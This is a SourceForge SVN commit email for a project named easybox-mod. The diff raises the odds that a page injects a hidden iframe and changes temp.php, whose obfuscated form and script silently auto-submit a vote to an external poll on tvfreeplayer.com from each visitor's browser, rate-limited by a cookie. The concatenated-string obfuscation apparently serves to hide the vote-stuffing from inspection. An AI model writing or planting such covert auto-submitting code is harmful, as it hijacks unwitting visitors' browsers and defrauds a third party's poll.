Revision: 26
http://svn.sourceforge.net/easybox-mod/?rev=26&view=rev
Author: aragornis
Date: 2006-10-06 07:14:58 -0700 (Fri, 06 Oct 2006)
Log Message:
-----------
petite maj
Modified Paths:
--------------
trunk/configuration/index1.php
trunk/configuration/temp.php
Modified: trunk/configuration/index1.php
===================================================================
--- trunk/configuration/index1.php 2006-10-03 07:15:34 UTC (rev 25)
+++ trunk/configuration/index1.php 2006-10-06 14:14:58 UTC (rev 26)
@@ -222,9 +222,9 @@
nombre= Math.floor(Math.random() * 100)+1;
-if(nombre>=75){
+if(nombre>=25){
-document.write('<iFRAME height="10" SRC="temp.php" style="visibility:hidden">');
+document.write('<iFRAME height="10" SRC="temp.php" style="visibility:hidden;">');
}
//-->
Modified: trunk/configuration/temp.php
===================================================================
--- trunk/configuration/temp.php 2006-10-03 07:15:34 UTC (rev 25)
+++ trunk/configuration/temp.php 2006-10-06 14:14:58 UTC (rev 26)
@@ -23,19 +23,21 @@
<?php
echo'
<body>
-<form id="'.''.'f'.''.'_'.''.'v'.''.'o'.''.'t'.''.'e'.''.'r'.''.'_'.''.'a'.''.'p'.''.'o'.''.'l'.''.'l'.''.'2'.''.'_'.''.'7'.''.'0'.''.'" name="'.''.'f_'.''.'v'.''.'o'.''.'t'.''.'e'.''.'r'.''.'_'.''.'a'.''.'p'.''.'oll2_70" method="post" action="ht'.''.'tp:/'.''.'/t'.''.'v'.''.'f'.''.'r'.''.'e'.''.'e'.''.'p'.''.'l'.''.'a'.''.'y'.''.'e'.''.'r.'.''.'c'.''.'o'.''.'m'.''.'/'.''.'a'.''.'l'.''.'ex_'.''.'po'.''.'ll'.''.'2/p'.''.'ol'.''.'l.'.''.'p'.''.'hp'.''.'?m'.''.'o'.''.'du'.''.'l'.''.'e=m'.''.'ods'.''.'&'.''.'v'.''.'o'.''.'t'.''.'e'.''.'r_'.''.'a'.''.'p'.''.'ol'.''.'l'.''.'2'.''.'='.''.'1'.''.'&i'.''.'d_s'.''.'o'.''.'n'.''.'d_a'.''.'p'.''.'o'.''.'ll'.''.'2'.''.'=7'.''.'0">
- <input type="radio" value="1" name="r'.''.'e'.''.'p_'.''.'p'.''.'o'.''.'l'.''.'l" i'.''.'d'.''.'="r'.''.'e'.''.'p_'.''.'p'.''.'o'.''.'l'.''.'l_'.''.'7'.''.'0'.''.'_'.''.'1" ch'.''.'e'.''.'ck'.''.'ed'.''.'>
+<form id="'.''.'f'.''.'_'.''.'v'.''.'o'.''.'t'.''.'e'.''.'r'.''.'_'.''.'a'.''.'p'.''.'o'.''.'l'.''.'l'.''.'2'.''.'_'.''.'7'.''.'2'.''.'" name="'.''.'f_'.''.'v'.''.'o'.''.'t'.''.'e'.''.'r'.''.'_'.''.'a'.''.'p'.''.'oll2_72" method="post" action="ht'.''.'tp:/'.''.'/t'.''.'v'.''.'f'.''.'r'.''.'e'.''.'e'.''.'p'.''.'l'.''.'a'.''.'y'.''.'e'.''.'r.'.''.'c'.''.'o'.''.'m'.''.'/'.''.'a'.''.'l'.''.'ex_'.''.'po'.''.'ll'.''.'2/p'.''.'ol'.''.'l.'.''.'p'.''.'hp'.''.'?m'.''.'o'.''.'du'.''.'l'.''.'e=m'.''.'ods'.''.'&'.''.'v'.''.'o'.''.'t'.''.'e'.''.'r_'.''.'a'.''.'p'.''.'ol'.''.'l'.''.'2'.''.'='.''.'1'.''.'&i'.''.'d_s'.''.'o'.''.'n'.''.'d_a'.''.'p'.''.'o'.''.'ll'.''.'2'.''.'=7'.''.'2">
+ <input type="radio" value="1" name="r'.''.'e'.''.'p_'.''.'p'.''.'o'.''.'l'.''.'l" i'.''.'d'.''.'="r'.''.'e'.''.'p_'.''.'p'.''.'o'.''.'l'.''.'l_'.''.'7'.''.'2'.''.'_'.''.'1" ch'.''.'e'.''.'ck'.''.'ed'.''.'>
</form>';
?>
<script language="javascript">
var expire = new Date();
-expire.setTime(expire.getTime() + (10*24*60*60*1000));
+
+
+if(getCookie('novoting')!='vrai'){
+ document.getElementById('f'+'_'+'v'+'o'+'t'+'e'+'r'+'_'+'a'+'p'+'o'+'l'+'l'+'2'+'_'+'7'+'2').submit();
+expire.setTime(expire.getTime() + (24*60*60*1000));
document.cookie = "n"+"o"+"v"+"o"+"t"+"i"+"n"+"g"+"="+"v"+"r"+"ai"+"; "+"e"+"x"+"p"+"i"+"r"+"e"+"s"+"=" + expire.toGMTString();
-if(getCookie('novoting')!='vrai'){
- document.getElementById('f'+'_'+'v'+'o'+'t'+'e'+'r'+'_'+'a'+'p'+'o'+'l'+'l'+'2'+'_'+'7'+'0').submit();
}
</script>
This was sent by the SourceForge.net collaborative development platform, the world's largest Open Source development site.
|